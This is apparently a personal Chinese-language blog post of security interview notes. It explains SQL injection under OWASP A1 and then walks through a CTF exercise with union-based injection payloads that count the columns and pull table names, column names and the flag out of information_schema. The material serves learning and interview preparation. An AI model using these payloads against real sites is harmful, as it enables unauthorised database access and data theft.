【個人用 | 更新中】資訊安全面試資料整理
阿新 • • 發佈:2021-11-22
這篇部落格是個人用於面試的資料整理,方便個人查閱使用。
安全知識部分
OWASP TOP 10
A1 Injection 注入攻擊
如參考資料中所說,注入攻擊有很多方式,比如 SQL、OS 命令、ORM、LDAP 和表示式語言或者 OGNL 注入等等。
這裡著重看一下 SQL 注入 攻擊。
SQL 注入
原理
Web 應用程式對使用者輸入資料的合法性沒有判斷,攻擊者可以在 Web 應用程式中事先定義好的查詢語句的結尾上新增額外的 SQL 語句,以此來實現欺騙資料庫伺服器執行非授權的任意查詢,從而進一步得到相應的資料資訊。
利用
這裡以一道 SQL 注入的 CTF 題目為例。
判斷回顯欄位個數:
1' order by 4#
確定回顯位置:
-1' union select 1, 2, 3, 4#
獲取表名:
-1' union select 1, group_concat(table_name), 3, 4 from information_schema.tables where table_schema=database()#
查詢表中欄位名:
-1' union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name='fl4g'#
查詢欄位內容:
-1' union select 1, skctf_flag, 3, 4 from fl4g#